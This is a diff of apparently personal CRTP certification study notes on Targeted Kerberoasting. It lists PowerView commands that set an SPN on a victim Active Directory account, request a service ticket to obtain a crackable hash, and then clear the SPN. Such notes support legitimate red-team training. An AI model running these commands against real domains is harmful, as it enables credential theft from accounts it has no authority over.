ViniciusClement/CRTP-2025/Notes.md

 The attacker can add an SPN (ServicePrincipalName) to that account.
 Once the account has an SPN, it becomes vulnerable to Kerberoasting.
 This technique is called Targeted Kerberoasting.

+**Windows**
-1. Make sur that the target account has no SPN Get-DomainUser 'victimuser' | Select serviceprincipalname
+1. Make sur that the target account has no SPN
+- Get-DomainUser 'victimuser' | Select serviceprincipalname

 2. Set the SPN
-Set-DomainObject -Identity 'victimuser' -Set @{serviceprincipalname='nonexistent/BLAHBLAH'}
+- Set-DomainObject -Identity 'victimuser' -Set @{serviceprincipalname='nonexistent/BLAHBLAH'}

 3. Obtain a kerberoast hash
-$User = Get-DomainUser 'victimuser'
+- $User = Get-DomainUser 'victimuser'
-$User | Get-DomainSPNTicket | fl
+- $User | Get-DomainSPNTicket | fl

 4. Clear the SPNs of the target account
-$User | Select serviceprincipalname
+- $User | Select serviceprincipalname
-Set-DomainObject -Identity victimuser -Clear serviceprincipalname
+- Set-DomainObject -Identity victimuser -Clear serviceprincipalname